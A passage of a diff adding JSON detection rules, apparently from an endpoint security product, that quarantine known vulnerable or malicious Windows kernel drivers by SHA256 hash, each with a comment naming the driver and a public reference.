+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481586Z",
+ "creation_date": "2026-03-23T11:45:30.481588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eae5c993b250dcc5fee01deeb30045b0e5ee7cf9306ef6edd8c58e4dc743a8ed",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ccc0042-e2fc-5016-8335-37ae8532ebdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468047Z",
+ "creation_date": "2026-03-23T11:45:30.468050Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae55720475ab1c67e39720954111b90e96a5ebf5d3b91277f4c225a228d8739a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cfe9c60-6ac5-5f72-b2cc-9ac94046baa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829827Z",
+ "creation_date": "2026-03-23T11:45:30.829829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75e07a123051d99caaf198834ee18164a005ff750eca127839d281f7bc5c1d30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d070e9d-39e2-5be5-9473-114a40c06509",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160970Z",
+ "creation_date": "2026-03-23T11:45:31.160972Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfb8abda2a0a39017307430131556ef48bf1183347aa91706a3e70f32c1531a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d0a2afd-8630-5d39-8f6f-21e6146c092c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826788Z",
+ "creation_date": "2026-03-23T11:45:31.826792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c85a3607f666212d7f6e5891d9c4b4f69d4c2b82dcfa1c3152922e3d2cf3fe5c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d13ba3c-6bd0-5b71-9760-0ca574aef54e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822501Z",
+ "creation_date": "2026-03-23T11:45:30.822505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72805e13777a39b440ef381720c0491e6091f9cb6c7b387be33ca5491fcfbfbd",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d16a9ea-b998-5a4e-83bc-a7acc28f9eec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972825Z",
+ "creation_date": "2026-03-23T11:45:29.972827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b59ad4a1f71f8379c89fc3bc1d2827b0785bbb0192b43549034f24a133eea3a5",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d325d2e-c61f-5a22-9016-f0e27001bd37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824295Z",
+ "creation_date": "2026-03-23T11:45:31.824298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0172627836f81e21554aa9c917dd609475a636e6a3a7365a327c394d4c682f92",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d3392fd-c8ff-5126-8192-78ae2d05bac8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817022Z",
+ "creation_date": "2026-03-23T11:45:31.817024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82ba478ac307f29eebe91ad48c821b1a81ddfd87ec76eb3fe551fa489835f8f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d3a708a-ea4b-5ef2-bf2d-6e25f3c59a74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609754Z",
+ "creation_date": "2026-03-23T11:45:29.609755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb81b5f8bf69637dbdf050181499088a67d24577587bc520de94b5ee8996240f",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d3dc74e-e503-52ac-8159-4c787bb48319",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143272Z",
+ "creation_date": "2026-03-23T11:45:31.143274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bff9f1531b378513d6385955fd17d213dbf896603d25a0609a5127b3a8010241",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d43b8ed-1ee6-59d9-adb0-a138a7b736b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979099Z",
+ "creation_date": "2026-03-23T11:45:29.979101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe14940b5d3068b7ceffd28a529196811f1d0e175522f4dfab26573e7aca0bb4",
+ "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d4c6820-c1ca-5492-b9be-e97cb506eee6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147077Z",
+ "creation_date": "2026-03-23T11:45:32.147079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf24c69123d4a72445547f7b5ad6738fb47f2d3fab06e3d628b7278113a63ae0",
+ "comment": "Vulnerable Kernel Driver (aka NSecKrnl.sys) [https://x.com/anylink20240604/status/1967181190949228608] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d665525-3db8-5c64-aeb7-c5416ed48fe9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481994Z",
+ "creation_date": "2026-03-23T11:45:31.481998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0795d8e203efeb47f37bbea4b99010253c1f5ada10e7f5fc23557ae2cd03e528",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d694239-05f9-558f-aa96-f72a3881a606",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143342Z",
+ "creation_date": "2026-03-23T11:45:31.143344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4503df4f3d32a5029e7029d76ea60648959278efb0fdf7ad480955a40e1b4540",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d7045e6-3bb5-56e5-84c8-c3793242b87d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619320Z",
+ "creation_date": "2026-03-23T11:45:29.619322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619327Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "caa85c44eb511377ea7426ff10df00a701c07ffb384eef8287636a4bca0b53ab",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d838449-d69d-56d0-a7e7-5ed798b4e617",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822000Z",
+ "creation_date": "2026-03-23T11:45:30.822002Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e160fc9d1990bc1e7ffa556d6ada19db0d2c5c7aeb23a491704b37854a666480",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d8b34c5-82a9-588f-bb50-5b30109c0c19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825819Z",
+ "creation_date": "2026-03-23T11:45:31.825821Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "965ed1c794e002a00da89938e099bb53c0693cef8bc6530052ac61108c21900a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dbd6a2f-e967-5da6-863d-41cdbe298369",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454298Z",
+ "creation_date": "2026-03-23T11:45:30.454302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dc38898-5a40-51dc-9035-5ea6a62c5420",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978633Z",
+ "creation_date": "2026-03-23T11:45:29.978635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be54f7279e69fb7651f98e91d24069dbc7c4c67e65850e486622ccbdc44d9a57",
+ "comment": "Vulnerable Kernel Driver (aka magdrvamd64.sys) [https://www.loldrivers.io/drivers/cfd36b2e-cf96-498e-aeb6-ee20e7b33bbb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dc8d590-c1a7-5b3b-9515-b608eccbc409",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616077Z",
+ "creation_date": "2026-03-23T11:45:29.616079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "316a27e2bdb86222bc7c8af4e5472166b02aec7f3f526901ce939094e5861f6d",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dcdb755-a0e3-5213-93bb-67ad3d6b84dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608527Z",
+ "creation_date": "2026-03-23T11:45:29.608529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8940e2e9b069ec94f9f711150b313b437f8429f78d522810601b6ee8b52bada",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ddadf89-ac9a-5f86-a52c-a16d9e02a4ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817470Z",
+ "creation_date": "2026-03-23T11:45:30.817472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
